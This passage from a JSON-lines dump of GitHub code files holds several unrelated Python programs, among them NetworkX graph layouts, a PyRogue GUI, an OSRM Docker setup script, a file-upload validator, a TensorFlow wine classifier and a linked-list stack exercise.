displacement*=0\n # loop over rows\n for i in range(A.shape[0]):\n if i in fixed:\n continue\n # difference between this row's node position and all others\n delta=(pos[i]-pos).T\n # distance between points\n distance=np.sqrt((delta**2).sum(axis=0))\n # enforce minimum distance of 0.01\n distance=np.where(distance<0.01,0.01,distance)\n # the adjacency matrix row\n Ai=np.asarray(A.getrowview(i).toarray())\n # displacement \"force\"\n displacement[:,i]+=\\\n (delta*(k*k/distance**2-Ai*distance/k)).sum(axis=1)\n # update positions\n length=np.sqrt((displacement**2).sum(axis=0))\n length=np.where(length<0.01,0.1,length)\n pos+=(displacement*t/length).T\n # cool temperature\n t-=dt\n\n return pos\n\n\ndef spectral_layout(G, dim=2, weight='weight', scale=1):\n \"\"\"Position nodes using the eigenvectors of the graph Laplacian. \n\n Parameters\n ----------\n G : NetworkX graph\n\n dim : int\n Dimension of layout\n\n weight : string or None optional (default='weight')\n The edge attribute that holds the numerical value used for\n the edge weight. 
If None, then all edge weights are 1.\n\n scale : float\n Scale factor for positions\n\n Returns\n -------\n dict :\n A dictionary of positions keyed by node\n\n Examples\n --------\n >>> G=nx.path_graph(4)\n >>> pos=nx.spectral_layout(G)\n\n Notes\n -----\n Directed graphs will be considered as unidrected graphs when\n positioning the nodes.\n\n For larger graphs (>500 nodes) this will use the SciPy sparse\n eigenvalue solver (ARPACK).\n \"\"\"\n # handle some special cases that break the eigensolvers\n try:\n import numpy as np\n except ImportError:\n raise ImportError(\"spectral_layout() requires numpy: http://scipy.org/ \")\n if len(G)<=2:\n if len(G)==0:\n pos=np.array([])\n elif len(G)==1:\n pos=np.array([[1,1]])\n else:\n pos=np.array([[0,0.5],[1,0.5]])\n return dict(zip(G,pos))\n try:\n # Sparse matrix\n if len(G)< 500: # dense solver is faster for small graphs\n raise ValueError\n A=nx.to_scipy_sparse_matrix(G, weight=weight,dtype='f')\n # Symmetrize directed graphs\n if G.is_directed():\n A=A+np.transpose(A)\n pos=_sparse_spectral(A,dim)\n except (ImportError,ValueError):\n # Dense matrix\n A=nx.to_numpy_matrix(G, weight=weight)\n # Symmetrize directed graphs\n if G.is_directed():\n A=A+np.transpose(A)\n pos=_spectral(A,dim)\n\n pos=_rescale_layout(pos,scale)\n return dict(zip(G,pos))\n\n\ndef _spectral(A, dim=2):\n # Input adjacency matrix A\n # Uses dense eigenvalue solver from numpy\n try:\n import numpy as np\n except ImportError:\n raise ImportError(\"spectral_layout() requires numpy: http://scipy.org/ \")\n try:\n nnodes,_=A.shape\n except AttributeError:\n raise nx.NetworkXError(\\\n \"spectral() takes an adjacency matrix as input\")\n\n # form Laplacian matrix\n # make sure we have an array instead of a matrix\n A=np.asarray(A)\n I=np.identity(nnodes,dtype=A.dtype)\n D=I*np.sum(A,axis=1) # diagonal of degrees\n L=D-A\n\n eigenvalues,eigenvectors=np.linalg.eig(L)\n # sort and keep smallest nonzero\n index=np.argsort(eigenvalues)[1:dim+1] # 0 index is zero eigenvalue\n return np.real(eigenvectors[:,index])\n\ndef _sparse_spectral(A,dim=2):\n # Input adjacency matrix A\n # Uses sparse eigenvalue solver from scipy\n # Could use multilevel methods here, see Koren \"On spectral graph drawing\"\n try:\n import numpy as np\n from scipy.sparse import spdiags\n except ImportError:\n raise ImportError(\"_sparse_spectral() requires scipy & numpy: http://scipy.org/ \")\n try:\n from scipy.sparse.linalg.eigen import eigsh\n except ImportError:\n # scipy <0.9.0 names eigsh differently \n from scipy.sparse.linalg import eigen_symmetric as eigsh\n try:\n nnodes,_=A.shape\n except AttributeError:\n raise nx.NetworkXError(\\\n \"sparse_spectral() takes an adjacency matrix as input\")\n\n # form Laplacian matrix\n data=np.asarray(A.sum(axis=1).T)\n D=spdiags(data,0,nnodes,nnodes)\n L=D-A\n\n k=dim+1\n # number of Lanczos vectors for ARPACK solver.What is the right scaling?\n ncv=max(2*k+1,int(np.sqrt(nnodes)))\n # return smallest k eigenvalues and eigenvectors\n eigenvalues,eigenvectors=eigsh(L,k,which='SM',ncv=ncv)\n index=np.argsort(eigenvalues)[1:k] # 0 index is zero eigenvalue\n return np.real(eigenvectors[:,index])\n\n\ndef _rescale_layout(pos,scale=1):\n # rescale to (0,pscale) in all axes\n\n # shift origin to (0,0)\n lim=0 # max coordinate for all axes\n for i in range(pos.shape[1]):\n pos[:,i]-=pos[:,i].min()\n lim=max(pos[:,i].max(),lim)\n # rescale to (0,scale) in all directions, preserves aspect\n for i in range(pos.shape[1]):\n pos[:,i]*=scale/lim\n return pos\n\n\n# fixture for 
nose tests\ndef setup_module(module):\n from nose import SkipTest\n try:\n import numpy\n except:\n raise SkipTest(\"NumPy not available\")\n try:\n import scipy\n except:\n raise SkipTest(\"SciPy not available\")\n","repo_name":"miniBloq/v0.83","sub_path":"source/Bin/Minibloq/lang/PPythonWin/v2.7.5.1/App/Lib/site-packages/networkx/drawing/layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":15348,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"3"} +{"seq_id":"71990811603","text":"def main():\n print(solution(\t[3, 0, 6, 1, 5])) # 6,5,3,1,0\n\ndef solution(citations):\n # citations.sort()\n # return citations[(len(citations)-1)//2]\n\n citations.sort()\n n = len(citations)\n for i in range (n):\n if citations[i] >= n-i:\n return n-i\n return 0\n \nif __name__ == \"__main__\":\n main()","repo_name":"da-in/algorithm-study","sub_path":"Programmers - 고득점 Kit/[정렬] H-Index/seungyeon.py","file_name":"seungyeon.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"3"} +{"seq_id":"1858048128","text":"#!/usr/bin/env python\n#-----------------------------------------------------------------------------\n# Title : PyRogue GUI module\n#-----------------------------------------------------------------------------\n# File : pyrogue/gui/_gui.py\n# Author : Ryan Herbst, rherbst@slac.stanford.edu\n# Created : 2016-09-29\n# Last update: 2016-09-29\n#-----------------------------------------------------------------------------\n# Description:\n# Python code for pyrogue GUI\n#-----------------------------------------------------------------------------\n# This file is part of the rogue software platform. It is subject to \n# the license terms in the LICENSE.txt file found in the top-level directory \n# of this distribution and at: \n# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. 
\n# No part of the rogue software platform, including this file, may be \n# copied, modified, propagated, or distributed except according to the terms \n# contained in the LICENSE.txt file.\n#-----------------------------------------------------------------------------\ntry:\n from PyQt5.QtWidgets import *\n from PyQt5.QtCore import *\n from PyQt5.QtGui import *\nexcept ImportError:\n from PyQt4.QtCore import *\n from PyQt4.QtGui import *\n\nimport pyrogue\nimport pyrogue.gui\nimport pyrogue.gui.variables\nimport pyrogue.gui.commands\nimport pyrogue.gui.system\nimport threading\nimport sys\n\n\ndef application(argv):\n return QApplication(argv)\n\nclass GuiTop(QWidget):\n\n newRoot = pyqtSignal(pyrogue.Root)\n newPyro = pyqtSignal(pyrogue.PyroRoot)\n\n def __init__(self,*, group,parent=None):\n super(GuiTop,self).__init__(parent)\n\n vb = QVBoxLayout()\n self.setLayout(vb)\n\n self.tab = QTabWidget()\n vb.addWidget(self.tab)\n\n self.var = pyrogue.gui.variables.VariableWidget(group=group,parent=self.tab)\n self.tab.addTab(self.var,'Variables')\n\n self.cmd = pyrogue.gui.commands.CommandWidget(group=group,parent=self.tab)\n self.tab.addTab(self.cmd,'Commands')\n self.show()\n\n self.newRoot.connect(self._addTree)\n self.newRoot.connect(self.var.addTree)\n self.newRoot.connect(self.cmd.addTree)\n\n self.newPyro.connect(self._addTree)\n self.newPyro.connect(self.var.addTree)\n self.newPyro.connect(self.cmd.addTree)\n\n self._appTop = None\n\n def addTree(self,root):\n if not root.running:\n raise Exception(\"GUI can not be attached to a tree which is not started\")\n\n if isinstance(root,pyrogue.PyroRoot):\n self.newPyro.emit(root)\n else:\n self.newRoot.emit(root)\n\n @pyqtSlot(pyrogue.Root)\n @pyqtSlot(pyrogue.PyroRoot)\n def _addTree(self,root):\n self.sys = pyrogue.gui.system.SystemWidget(root=root,parent=self.tab)\n self.tab.addTab(self.sys,root.name)\n self.adjustSize()\n\n","repo_name":"codacy-badger/rogue","sub_path":"python/pyrogue/gui/_gui.py","file_name":"_gui.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"71966539280","text":"# Regex search\r\n# 1.Get the path of the folder and regular expression;\r\n# 2.Open all .txt files in this folder and search the regex in it;\r\n# 3.Print the result to the screen.\r\n\r\nimport os\r\nimport re\r\n\r\n# 1.Path and regular expression.\r\npath = str(input('Which folder do you want to search?\\n'))\r\nregexStr = input('Which pattern do you want to search?\\n')\r\nregex = re.compile(regexStr)\r\npattern = []\r\n\r\n# 2.Search regex\r\nfor files in os.listdir(path):\r\n if files.endswith('.txt'):\r\n f = open(os.path.join(path, files))\r\n pattern += regex.findall(f.read())\r\n\r\n# 3.Print\r\nprint(pattern)\r\n","repo_name":"AzuLiu/AutomateBoringStuff","sub_path":"regexSearch.py","file_name":"regexSearch.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"6872224436","text":"import numpy as np\nfrom config import *\n\ndef data_augment(states_list,probs_list,wins_list):\n states = []\n probs = []\n for rot in range(4):\n rotated_states_list = [np.rot90(f, rot, axes=(1, 2)) for f in states_list]\n flipped_states_list = [np.flip(f,axis=-1) for f in rotated_states_list]\n rotated_probs_list = [np.rot90(f.reshape(BOARD_SIZE), rot).reshape(-1) for f in probs_list]\n flipped_probs_list = [np.flip(f.reshape(BOARD_SIZE),axis=-1).reshape(-1) for f in 
rotated_probs_list]\n\n states += rotated_states_list\n states += flipped_states_list\n\n probs += rotated_probs_list\n probs += flipped_probs_list\n\n return np.array(states,dtype=np.float32,),\\\n np.array(probs,dtype=np.float32),\\\n np.array(wins_list*8,dtype=np.float32).reshape(-1,1)\n\n\nclass Buffer(object):\n def __init__(self,buffer_size):\n self.state_buffer = np.zeros((buffer_size, 4,BOARD_SIZE[0], BOARD_SIZE[1]), dtype=np.float32)\n self.prob_buffer = np.zeros((buffer_size, BOARD_SIZE[0] * BOARD_SIZE[1]), dtype=np.float32)\n self.win_buffer = np.zeros((buffer_size, 1), dtype=np.float32)\n self.buffer_index = 0\n self.num_sample = 0\n self.buffer_size = buffer_size\n def append_many(self,state_a,prob_a,win_a):\n print (state_a.shape,prob_a.shape,win_a.shape)\n data_length = state_a.shape[0]\n if self.buffer_index + data_length < self.buffer_size:\n b, e = self.buffer_index, self.buffer_index + data_length\n self.state_buffer[b:e] = state_a\n self.prob_buffer[b:e] = prob_a\n self.win_buffer[b:e] = win_a\n self.buffer_index = (self.buffer_index + data_length) % self.buffer_size\n self.num_sample += data_length\n else:\n batch_1_size = self.buffer_size - self.buffer_index\n batch_2_size = data_length - batch_1_size\n\n print (\"batch_1_size\",batch_1_size)\n print (\"batch_2_size\",batch_2_size)\n\n b = self.buffer_index\n self.state_buffer[b:] = state_a[:batch_1_size]\n self.prob_buffer[b:] = prob_a[:batch_1_size]\n self.win_buffer[b:] = win_a[:batch_1_size]\n self.state_buffer[:batch_2_size] = state_a[batch_1_size:]\n self.prob_buffer[:batch_2_size] = prob_a[batch_1_size:]\n self.win_buffer[:batch_2_size] = win_a[batch_1_size:]\n self.buffer_index = batch_2_size\n self.num_sample += data_length\n\n self.num_sample = min(self.buffer_size, self.num_sample)\n def sample(self,batch_size):\n index = np.random.choice(self.num_sample,batch_size,replace=False)\n sample_states = self.state_buffer[index]\n sample_probs = self.prob_buffer[index]\n sample_wins = self.win_buffer[index]\n\n return sample_states,sample_probs,sample_wins\n\n def __len__(self):\n return self.num_sample\n\ndef get_input(game):\n while True:\n input_str = input(\"action: x,y:\\n\")\n try:\n x,y = input_str.split(',')\n x = int(x)\n y = int(y)\n except:\n print(\"Invalid format\")\n continue\n try:\n assert game.legal_positions[x,y]==True\n except AssertionError:\n print(\"Invalid position\")\n continue\n break\n return x,y","repo_name":"airaria/AlphaZero_Gomoku_WuZiQi","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"13301213976","text":"class Solution:\n def letterCombinations(self, digits):\n digitsMap = {\"0\":[], \"1\":[],\n \"2\":['a','b','c'],\n \"3\":['d','e','f'],\n \"4\":['g','h','i'],\n \"5\":['j','k','l'],\n \"6\":['m','n','o'],\n \"7\":['p', 'q', 'r', 's'],\n \"8\":['t', 'u', 'v'],\n \"9\":['w', 'x', 'y', 'z'],\n }\n retList = []\n\n def helperFunc(input, templist):\n if input == \"\":\n retList.append(templist)\n else:\n for i in range(len(digitsMap[input[0]])):\n helperFunc(input[1:], templist + digitsMap[input[0]][i])\n\n helperFunc(digits, \"\")\n return retList\n\nsol = Solution()\ninput = 
\"23\"\nprint(sol.letterCombinations(input))","repo_name":"adalloul0928/Leetcode_Hell","sub_path":"Archive/Facebook/Recursion/letterCombinationPhone.py","file_name":"letterCombinationPhone.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72930724881","text":"from tkinter import *\r\nfrom tkinter import messagebox\r\ndef clicked():\r\n messagebox.showinfo('Заголовок', 'Текст')\r\nwindow = Tk()\r\n\r\nwindow.title(\"Добро пожаловать в приложение PythoneRu\")\r\nwindow.geometry('400x250')\r\nbtn = Button(window, text='Клик', command=clicked)\r\nbtn.grid(column=0, row=0)\r\nwindow.mainloop()","repo_name":"Vyacsheslav/interface","sub_path":"twelve.py","file_name":"twelve.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"69793798161","text":"#coding: utf8\nfrom flask import request\nfrom farbox_bucket.utils import smart_unicode, to_int\nfrom farbox_bucket.utils.functional import cached_property\nfrom farbox_bucket.utils.url import unqote_url_path_to_unicode\nimport urllib\n\n\ndef compute_auto_pages(pages, current_page=1, max_count=10):\n # 1 ...... n\n if max_count < 6:\n max_count = 6\n if pages <= max_count:\n return range(1, pages+1)\n\n just_head = range(1, max_count-1) + [0, pages]\n just_foot = [1, 0] + range(pages-max_count+1, pages+1)\n\n if current_page in just_head and current_page!=pages:\n if current_page < max_count/2:\n return just_head\n if current_page in just_foot and current_page!=1:\n if current_page > pages-max_count/2:\n return just_foot\n\n auto_fix_count = (max_count - 2*2)/2\n head = [1, 2]\n foot = [pages-1, pages]\n _middle_list = range(current_page-auto_fix_count+1, current_page+auto_fix_count)\n middle_list = []\n for i in _middle_list:\n if 1 self.total_pages or self.page < 1:\n return []\n else:\n return self._list_object\n\n\n @cached_property\n def pre_page(self):\n return self.previous_page\n\n @cached_property\n def has_previous(self):\n return self.page > 1\n\n @cached_property\n def has_pre(self):\n return self.has_previous\n\n @cached_property\n def has_next(self):\n return self.page < self.total_pages\n\n @staticmethod\n def get_page_url(page_number):\n if '/page/' in request.url:\n base = request.path.split('/page/', 1)[0]\n else:\n base = request.path\n if page_number != 1:\n url = ('%s/page/%s' % (base, page_number)).replace('//', '/')\n else:\n url = base.replace('//', '/') or '/'\n if request.query_string:\n query_string = request.query_string\n if '%' in query_string:\n query_string = urllib.unquote(query_string)\n url += '?%s' % smart_unicode(query_string)\n url = url.replace('\"', '%22').replace(\"'\", '%27') # 避免被跨站\n return url\n\n @cached_property\n def previous_page_url(self):\n if self.has_previous:\n return self.get_page_url(self.previous_page)\n else:\n return '#'\n\n @cached_property\n def pre_page_url(self):\n return self.previous_page_url\n\n @cached_property\n def pre_url(self):\n return self.pre_page_url\n\n @cached_property\n def next_page_url(self):\n if self.has_next:\n return self.get_page_url(self.next_page)\n else:\n return '#'\n\n @cached_property\n def next_url(self):\n return self.next_page_url\n\n @cached_property\n def page_numbers(self):\n return self.get_page_numbers()\n\n def set_default_max_page_numbers(self, numbers):\n # 设定 auto_pages 计算时,最大的长度跨度\n numbers = to_int(numbers)\n if isinstance(numbers, int) and 50 > 
numbers > 3:\n self.default_max_page_numbers = numbers\n return ''\n\n def get_page_numbers(self, max_count=None):\n if not max_count:\n max_count = self.default_max_page_numbers\n return compute_auto_pages(self.total_pages, current_page=self.page, max_count=max_count)","repo_name":"hepochen/FarBox","sub_path":"farbox_bucket/server/utils/record_and_paginator/base_paginator.py","file_name":"base_paginator.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"3"} +{"seq_id":"30961645179","text":"import subprocess\nimport os\n\ndef main(config, logger, transport_mode, compile_osrm):\n ''' run the shell script that\n - removes the existing docker\n - downloads the osrm files\n - establishes the osrm routing docker\n '''\n logger.error('Initialize the OSRM server for {} to {} in {}'.format(transport_mode, config['services'],config['location']['city']))\n # transport mode options\n mode_dict = {'driving':'car_x','walking':'foot_x','cycling':'bicycle_x'}\n\n # pull the variables from the config file\n osm_subregion = config['OSM']['osm_subregion']\n osm_region = config['OSM']['osm_region']\n port = config['OSRM']['port']\n transport_mode = mode_dict[transport_mode]\n directory = config['OSM']['data_directory']\n state = config['location']['state']\n\n # in shell, remove any existing dockers\n shell_commands = [\n 'docker stop osrm-xmin-{}'.format(state),\n 'docker rm osrm-xmin-{}'.format(state),\n ]\n for com in shell_commands:\n subprocess.run(com.split())\n\n # download the data\n # download_data = 'wget -N https://download.geofabrik.de/{}/{}-latest.osm.pbf -P {}'.format(osm_region, osm_subregion, directory)\n # p = subprocess.run(download_data.split(), stderr=subprocess.PIPE, bufsize=0)\n # compile_osrm = '304 Not Modified' not in str(p.stderr)\n compile_osrm = True #False # \n\n # if the data does not redownload, it does not need to re-compile.\n if compile_osrm:\n logger.error('Compiling the data files')\n shell_commands = [\n # init docker data\n 'docker run -t -v {}:/data osrm/osrm-backend osrm-extract -p /data/profiles/{}.lua /data/{}-latest.osm.pbf'.format(directory, transport_mode, osm_subregion),\n 'docker run -t -v {}:/data osrm/osrm-backend osrm-partition /data/{}-latest.osrm'.format(directory, osm_subregion),\n 'docker run -t -v {}:/data osrm/osrm-backend osrm-customize /data/{}-latest.osrm'.format(directory, osm_subregion),\n ]\n for com in shell_commands:\n subprocess.run(com.split(), stdout=open(os.devnull, 'wb'))\n else:\n logger.error('Data not re-downloaded and compiled because no changes to online version')\n\n run_docker = 'docker run -d --name osrm-xmin-{} -t -i -p {}:5000 -v {}:/data osrm/osrm-backend osrm-routed --algorithm mld --max-table-size 100000 /data/{}-latest.osrm'.format(state, port, directory, osm_subregion)\n subprocess.run(run_docker.split())\n\n logger.error('OSRM server initialized')\n \n","repo_name":"urutau-nz/x-minute-city","sub_path":"src/init_osrm.py","file_name":"init_osrm.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34070427076","text":"import os\nfrom typing import List\n\nfrom werkzeug.datastructures import FileStorage\n\nfrom licenseware.common.constants import states\nfrom licenseware.common.validators.file_validators import GeneralValidator\nfrom licenseware.utils.file_utils import save_file\n\n\nclass FileContentValidator:\n def __init__(\n self,\n 
uploader_id: str,\n required_input_type: str = None,\n required_sheets: list = [],\n required_columns: list = [],\n text_contains_all: list = [],\n text_contains_any: list = [],\n regex_escape: bool = True,\n min_rows_number: int = 0,\n header_starts_at: int = 0,\n buffer: int = 9000,\n **kwargs\n ):\n self.uploader_id = uploader_id\n self.required_input_type = required_input_type\n self.required_sheets = required_sheets\n self.required_columns = required_columns\n self.text_contains_all = text_contains_all\n self.text_contains_any = text_contains_any\n self.regex_escape = regex_escape\n self.min_rows_number = min_rows_number\n self.header_starts_at = header_starts_at\n self.buffer = buffer\n self.kwargs = kwargs\n\n def get_file_objects_from_request(self, flask_request):\n\n file_objects: List[FileStorage] = flask_request.files.getlist(\"files[]\")\n\n bad_request = {\n \"status\": states.FAILED,\n \"message\": \"Files list is empty or files are not on 'files[]' key\",\n \"validation\": [\n {\n \"status\": states.FAILED,\n \"filename\": \"No valid files\",\n \"filepath\": \"Files not saved\",\n \"message\": \"Files list is empty or files are not on 'files[]' key\",\n }\n ],\n }, 400\n\n if not isinstance(file_objects, list):\n return bad_request\n if file_objects == []:\n return bad_request\n\n return file_objects\n\n def get_only_valid_file_objects(self, file_objects: list) -> List[str]:\n\n filenames = [f.filename for f in file_objects]\n filenames_validation_response = self.validate_filenames(filenames)\n\n valid_filenames = []\n for response in filenames_validation_response:\n if response[\"status\"] == states.SUCCESS:\n valid_filenames.append(response[\"filename\"])\n\n validation_file_objects = []\n for file in file_objects:\n if file.filename in valid_filenames:\n validation_file_objects.append(file)\n else:\n file.close()\n\n return validation_file_objects\n\n def validate_filepaths_content(self, filepaths: list):\n\n validation_response = []\n for filepath in filepaths:\n\n try:\n\n GeneralValidator(\n input_object=filepath,\n required_input_type=self.required_input_type,\n required_sheets=self.required_sheets,\n required_columns=self.required_columns,\n text_contains_all=self.text_contains_all,\n text_contains_any=self.text_contains_any,\n regex_escape=self.regex_escape,\n min_rows_number=self.min_rows_number,\n header_starts_at=self.header_starts_at,\n buffer=self.buffer,\n )\n\n validation_response.append(\n {\n \"status\": states.SUCCESS,\n \"filename\": os.path.basename(filepath),\n \"filepath\": filepath,\n \"message\": self.filename_valid_message,\n }\n )\n\n except Exception as err:\n validation_response.append(\n {\n \"status\": states.FAILED,\n \"filename\": os.path.basename(filepath),\n \"filepath\": filepath,\n \"message\": self.filename_invalid_message or str(err),\n }\n )\n\n return validation_response\n\n def validate_file_objects(self, file_objects: list, tenant_id: str) -> list:\n\n validation_response = []\n\n valid_file_objects = self.get_only_valid_file_objects(file_objects)\n\n if valid_file_objects == []:\n validation_response.append(\n {\n \"status\": states.FAILED,\n \"filename\": \"No valid filenames\",\n \"filepath\": \"File not saved\",\n \"message\": self.filename_invalid_message,\n }\n )\n return validation_response\n\n for file in valid_file_objects:\n try:\n\n GeneralValidator(\n input_object=file,\n required_input_type=self.required_input_type,\n required_sheets=self.required_sheets,\n required_columns=self.required_columns,\n 
text_contains_all=self.text_contains_all,\n text_contains_any=self.text_contains_any,\n min_rows_number=self.min_rows_number,\n header_starts_at=self.header_starts_at,\n buffer=self.buffer,\n )\n\n # Save validated file to disk\n filepath = save_file(file, tenant_id)\n\n validation_response.append(\n {\n \"status\": states.SUCCESS,\n \"filename\": file.filename,\n \"filepath\": filepath,\n \"message\": self.filename_valid_message,\n }\n )\n\n except Exception as err:\n validation_response.append(\n {\n \"status\": states.FAILED,\n \"filename\": file.filename,\n \"filepath\": \"File not saved\",\n \"message\": self.filename_invalid_message or str(err),\n }\n )\n\n return validation_response\n\n def get_overall_status_and_message(self, validation_response: list):\n\n status = states.SUCCESS\n message = \"Files are valid\"\n for res in validation_response:\n if res[\"status\"] == states.FAILED:\n status = states.FAILED\n message = \"Not all files are valid\"\n break\n\n status_code = 200 if status == states.SUCCESS else 400\n\n return status, message, status_code\n\n def get_file_objects_response(self, flask_request):\n \"\"\"\n receive flask_request\n validate file names and file contents\n save to disk valid files\n create json response\n \"\"\"\n\n tenant_id = flask_request.headers.get(\"Tenantid\")\n\n file_objects = self.get_file_objects_from_request(flask_request)\n if not isinstance(file_objects, list):\n return file_objects\n validation_response = self.validate_file_objects(file_objects, tenant_id)\n status, message, status_code = self.get_overall_status_and_message(\n validation_response\n )\n\n return {\n \"tenant_id\": tenant_id,\n \"status\": status,\n \"message\": message,\n \"validation\": validation_response,\n }, status_code\n","repo_name":"licenseware/licenseware-sdk-v2","sub_path":"licenseware/uploader_validator/file_content_validator.py","file_name":"file_content_validator.py","file_ext":"py","file_size_in_byte":7426,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"71468031120","text":"'''\nThird project - Learning to classify wines : multiclass classification\n trying to classify wines based on their place of origin\n'''\nimport matplotlib.pyplot as plt \nimport pandas as pd \nimport tensorflow as tf \nfrom sklearn.utils import shuffle\nfrom sklearn import preprocessing\n\ndf = pd.read_csv('./wine.csv', header=0)\nprint(df.describe())\n\nfor i in range(1, 8):\n number = 420+i\n ax1 = plt.subplot(number)\n ax1.locator_params(nbins=3)\n plt.title(list(df)[i])\n ax1.scatter(df[df.columns[i]], df['Wine'])\nplt.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)\n# plt.show()\n\nsess = tf.InteractiveSession()\n\nX = df[df.columns[1:13]].values\ny = df['Wine'].values-1\n\nY = tf.one_hot(indices=y, depth=3, on_value=1, off_value=0, axis=1, name='a').eval()\nX,Y = shuffle(X, Y)\n\nscaler = preprocessing.StandardScaler()\nX = scaler.fit_transform(X)\n\n# Create the model\nx = tf.placeholder(tf.float32, [None, 12])\nW = tf.Variable(tf.zeros([12, 3]))\nb = tf.Variable(tf.zeros([3]))\ny = tf.nn.softmax(tf.matmul(x, W)+b)\n\n\n# Define loss and optimizer\ny_ = tf.placeholder(tf.float32, [None, 3])\ncross_entropy = tf.reduce_mean(-tf.reduce_sum(y_*tf.log(y), reduction_indices=[1]))\ntrain_step = tf.train.GradientDescentOptimizer(0.1).minimize(cross_entropy)\n\n\n# Train\ntf.global_variables_initializer().run()\nfor i in range(100):\n X,Y = shuffle(X,Y, random_state=1)\n Xtr, Ytr = X[0:140,:], Y[0:140,:]\n Xt, Yt = X[140:178,:], 
Y[140:178,:]\n\n Xtr, Ytr = shuffle(Xtr, Ytr, random_state=0)\n\n batch_xs, batch_ys = Xtr, Ytr\n train_step.run(feed_dict={x:batch_xs, y_:batch_ys})\n cost = sess.run(cross_entropy, feed_dict={x:batch_xs, y_:batch_ys})\n\n\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n print(accuracy.eval({x:Xt, y_:Yt}))\n","repo_name":"dezhili/My_learnings","sub_path":"ML_note/BuildingMLwithTensorflow/Chapter5/thiredproject.py","file_name":"thiredproject.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35188988165","text":"# Stack LIFO\n# ------------------------------------------------\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\nclass Stack:\n def __init__(self):\n self.head = None\n\n# Stack Push\n# DONE\n# DONE Redo the stracture of the stack\n# ------------------------------------------------\n# Create push(val) that adds val to our stack.\n def push(self, val):\n # add new node to the end of the list\n new_node = Node(val) # create the node\n\n # handle the case where the list is empty\n current_head = self.head # added\n new_node.next = current_head\n self.head = new_node\n return self\n\n# Stack Top\n# DONE\n# DONE Empty Cast\n# DONE empact of edit the push\n# ------------------------------------------------\n# Return (not remove) the stack’s top value.\n def top(self):\n if self.head == None:\n return\n else:\n return self.head.value\n\n# Stack Is Empty\n# DONE\n# DONE Test empty case\n# ------------------------------------------------\n# Return whether the stack is empty.\n def isEmpty(self):\n return self.head == None\n\n# Stack Pop\n# DONE\n# TODO do we return the removed value or the value before it ?\n# DONE fixing after creating push method\n# ------------------------------------------------r\n# Create pop() to remove and return the top val.\n def pop(self):\n # removes and returns the last node of the list-\n if self.isEmpty():\n return\n else:\n removed = self.head.value\n self.head = self.head.next\n return removed\n\n# Stack Contains\n# DONE\n# ------------------------------------------------\n# Return whether given val is within the stack.\n def contains(self, val):\n # returns a boolean on whether or not the val is in the list\n index = self.head\n while (index):\n if (index.value == val):\n return True\n else:\n index = index.next\n return False\n\n# Stack Size\n# DONE\n# DONE Review\n# ------------------------------------------------\n# Return the number of stacked values.\n def size(self):\n count = 0\n index = self.head\n while (index):\n count += 1\n index = index.next\n return count\n\n# ------------------------------------------------\n# Added: String Method.\n# ------------------------------------------------\n def display(self):\n string = \"[\"\n index = self.head\n while (index):\n string += str(index.value)\n if(index.next):\n string += \"->\"\n index = index.next\n string += \"]\"\n return string\n\n\nif __name__ == \"__main__\":\n print('-'*90)\n print('Create Stack',)\n stack = Stack()\n print('Top values:', stack.top())\n print('-'*90)\n print('Adding 2 values:')\n print('Is empty:', stack.isEmpty(), 'The size is', stack.size())\n print('Stack after adding:', stack.push(10).push(20).display())\n print('-'*90)\n print('Is empty:', stack.isEmpty(), 'The size is', stack.size())\n print('Top values:', stack.top())\n stack.pop()\n 
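# Added illustrative aside (not part of the original dayOne.py): a minimal LIFO sanity check\n # using the Stack API defined above (push() returns self; pop() returns the removed value).\n demo = Stack()\n demo.push(1).push(2).push(3)\n assert [demo.pop(), demo.pop(), demo.pop()] == [3, 2, 1]\n 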
print('Top values:', stack.top())\n stack.pop()\n print('Top values:', stack.top())\n stack.push(10).push(20)\n print('-'*90)\n print('Removing 2 values:')\n while stack.isEmpty() == False:\n print('Stack:', stack.display(), 'Top:',\n stack.top(), 'Size:', stack.size())\n print('Remove:', stack.pop())\n print('Is empty:', stack.isEmpty())\n print('Stack:', stack.display(), 'Top:',\n stack.top(), 'Size:', stack.size())\n print('Remove:', stack.pop())\n print('-'*90)\n print('Size of empty:', stack.isEmpty(), stack.size())\n print('Size of none empty:', stack.push(1).push(2).isEmpty(), stack.size())\n print('-'*90)\n print('Contains 20:', stack.contains(20))\n print('Contains 4:', stack.contains(4))\n stack.pop()\n stack.pop()\n print('Is empty:', stack.isEmpty())\n print('Contains 4:', stack.contains(4))\n print('Contains 4:', stack.push(4).contains(4))\n","repo_name":"SaudiWebDev2020/Murtada_Almutawah","sub_path":"Challenges/weekFive/dayOne.py","file_name":"dayOne.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"36970540195","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 